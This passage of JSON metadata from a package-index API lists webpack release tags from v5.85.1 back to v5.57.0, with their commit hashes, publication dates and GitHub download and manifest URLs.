_id":null,"purl":"pkg:github/webpack/webpack@v5.85.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1/manifests"},{"name":"v5.85.0","sha":"c80b069dca8eedebfa8ede9ce740891362fdb8bf","kind":"tag","published_at":"2023-05-31T19:20:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0/manifests"},{"name":"v5.84.1","sha":"71d9a21c32974b5166f9ce2f5549849d0c7ad310","kind":"tag","published_at":"2023-05-25T18:35:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1/manifests"},{"name":"v5.84.0","sha":"4d4caf13add84f996790e5bbdf79b66a548f8273","kind":"tag","published_at":"2023-05-24T17:00:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0/manifests"},{"name":"v5.83.1","sha":"81c8fbde2e0e4b8d2e30a5109dedc082ef8c09dc","kind":"tag","published_at":"2023-05-17T20:22:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1/manifests"},{"name":"v5.83.0","sha":"ccb3b860520c9472eff3d411a48105f882cf482a","kind":"tag","published_at":"2023-05-17T15:29:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0/manifests"},{"name":"v5.82.1","sha":"a8fd8b7598e8a599871765e0167cacf8318944a9","kind":"tag","published_at":"2023-05-10T15:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1/manifests"},{"name":"v5.82.0","sha":"1018ca80b31ea72436510398cca5be335b6ac81c","kind":"tag","published_at":"2023-05-03T17:03:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0/manifests"},{"name":"v5.81.0","sha":"5c016a8ec1bbfd73a7fc20d4b474938e61ee3a57","kind":"tag","published_at":"2023-04-26T14:41:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.81.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0/manifests"},{"name":"v5.80.0","sha":"9ac1728ee359efbbd1eb317f4a12c0f8136a690e","kind":"tag","published_at":"2023-04-19T16:56:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.80.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0/manifests"},{"name":"v5.79.0","sha":"ecdcc1a1d02a3097acb9ebc0896365ae1f4d25e2","kind":"tag","published_at":"2023-04-12T15:12:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.79.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0/manifests"},{"name":"v5.78.0","sha":"e51f8347026588c90f9bd91681597e97f24f40c9","kind":"tag","published_at":"2023-04-05T18:09:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.78.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0/manifests"},{"name":"v5.77.0","sha":"263f29189060529198b7ab4dbddfd2dca46bd96e","kind":"tag","published_at":"2023-03-29T14:19:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.77.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0/manifests"},{"name":"v5.76.3","sha":"8ac9616280aebfb61ae7484f06ad1979d73e6a56","kind":"tag","published_at":"2023-03-22T14:59:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3/manifests"},{"name":"v5.76.2","sha":"dbf7bf39ab96e1462603435c150d601bb69ebe4e","kind":"tag","published_at":"2023-03-15T15:00:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2/manifests"},{"name":"v5.76.1","sha":"21be52b681c477f8ebc41c1b0e7a7a8ac4fa7008","kind":"commit","published_at":"2023-03-10T22:59:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1/manifests"},{"name":"v5.76.0","sha":"97b1718720c33f1b17302a74c5284b01e02ec001","kind":"commit","published_at":"2023-03-08T17:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0/manifests"},{"name":"v5.75.0","sha":"8241da7f1e75c5581ba535d127fa66aeb9eb2ac8","kind":"tag","published_at":"2022-11-09T15:27:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.75.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0/manifests"},{"name":"v5.74.0","sha":"8f87b50dc7ac24eb5c91fd0d55a22e34e252863c","kind":"tag","published_at":"2022-07-25T08:00:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.74.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0/manifests"},{"name":"v5.73.0","sha":"36051a5ca77b4fa33fac651e1af650c7b910a873","kind":"tag","published_at":"2022-06-02T11:24:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.73.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0/manifests"},{"name":"v5.72.1","sha":"08ecfbbc035b12f2ed5c0b83b53011dfe57ae7c9","kind":"tag","published_at":"2022-05-10T10:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1/manifests"},{"name":"v5.72.0","sha":"d3a0f8de03f26a83b4d5db3cfe177617a3801df3","kind":"tag","published_at":"2022-04-07T12:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0/manifests"},{"name":"v5.71.0","sha":"c2079f7e7666a913d6fdad4b9102ffb0d3801cc8","kind":"tag","published_at":"2022-04-01T13:41:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.71.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0/manifests"},{"name":"v5.70.0","sha":"5a26b7c4a923c42022ca97fe9cbf46907a20d6d8","kind":"tag","published_at":"2022-03-03T14:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.70.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0/manifests"},{"name":"v5.69.1","sha":"dfdc8b133d3d49371251e29efeefb9d31b982c9e","kind":"tag","published_at":"2022-02-17T13:46:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1/manifests"},{"name":"v5.69.0","sha":"9d21401151b32abcefad0ffdb3238da91e2089ef","kind":"tag","published_at":"2022-02-15T12:33:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0/manifests"},{"name":"v5.68.0","sha":"f593d98453e7920bf65f24bf051cd67b5704b59d","kind":"tag","published_at":"2022-01-31T16:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.68.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0/manifests"},{"name":"v5.67.0","sha":"4abe329dcdaea60371c03c0d85c3a3994d875138","kind":"tag","published_at":"2022-01-21T17:44:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.67.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0/manifests"},{"name":"v5.66.0","sha":"0105bc1f005d78e3819a567ffb91432683569070","kind":"tag","published_at":"2022-01-12T08:23:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.66.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0/manifests"},{"name":"v5.65.0","sha":"323d65e2b1f6d275bf1b4a93ef753f027de78193","kind":"tag","published_at":"2021-12-06T13:57:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.65.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0/manifests"},{"name":"v5.64.4","sha":"d3cd4cb6e38338237fe722d4b7feae2244c425c5","kind":"tag","published_at":"2021-11-25T15:49:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4/manifests"},{"name":"v5.64.3","sha":"c66e4ce32027fd31935ce9197c219e46308ebd3f","kind":"tag","published_at":"2021-11-24T08:27:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3/manifests"},{"name":"v5.64.2","sha":"0065223c4ddac3bf872bc8d660ef1e9a63afa080","kind":"tag","published_at":"2021-11-20T13:43:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2/manifests"},{"name":"v5.64.1","sha":"3d5503a5b535b89bbdde78535c1839cefd88e4fa","kind":"tag","published_at":"2021-11-15T17:16:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1/manifests"},{"name":"v5.64.0","sha":"789e58514b5747f6474bc247e4e104ce22892a2c","kind":"tag","published_at":"2021-11-11T14:16:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0/manifests"},{"name":"v5.63.0","sha":"f011c70aacbd4dd3c4e518b9b9d8ea945dce0a9a","kind":"tag","published_at":"2021-11-09T19:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.63.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0/manifests"},{"name":"v5.62.2","sha":"3aed1fe0249f8730a35fab62e3cdc3b399b0b6e9","kind":"tag","published_at":"2021-11-09T11:12:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2/manifests"},{"name":"v5.62.1","sha":"daba59b3d60e7895543b6563682c209e4ad6b8b8","kind":"tag","published_at":"2021-11-05T16:26:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1/manifests"},{"name":"v5.62.0","sha":"04640dcc757c8b3e78c6cbf6e4dda7cbbde33fe2","kind":"tag","published_at":"2021-11-05T14:56:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0/manifests"},{"name":"v5.61.0","sha":"0306510f7d1b9b13900f1dcf78a767c2ed390a61","kind":"tag","published_at":"2021-10-29T14:00:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.61.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0/manifests"},{"name":"v5.60.0","sha":"f0298fe46fc22eebf42eb034a9435d7c19aeddd9","kind":"tag","published_at":"2021-10-25T16:20:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.60.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0/manifests"},{"name":"v5.59.1","sha":"3dbbdcb28cce3860247f06a18e48f536ab266834","kind":"tag","published_at":"2021-10-20T21:39:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1/manifests"},{"name":"v5.59.0","sha":"19ca23f062544263f48d2947da0ecfb29ae0bb36","kind":"tag","published_at":"2021-10-19T17:54:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0/manifests"},{"name":"v5.58.2","sha":"8a6d156c156282dd3d0ba001187c282402a1177f","kind":"tag","published_at":"2021-10-13T09:39:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2/manifests"},{"name":"v5.58.1","sha":"2eecffb2739d13d3095568d118ffc0baacec5cd8","kind":"tag","published_at":"2021-10-08T13:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1/manifests"},{"name":"v5.58.0","sha":"7666277551be32947227e80fb2fccdbbe656254b","kind":"tag","published_at":"2021-10-07T15:48:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0/manifests"},{"name":"v5.57.1","sha":"0581bb3c1c32bcb3e182a0f732b862a6c5bb7846","kind":"tag","published_at":"2021-10-05T18:25:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1/manifests"},{"name":"v5.57.0","sha":"e841ab01417f8e1dd6a2533638f848b5ad0c7d16","kind":"tag","published_at":"2021-10-05T15:06:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0","manifests_url":"https://repos.ecosy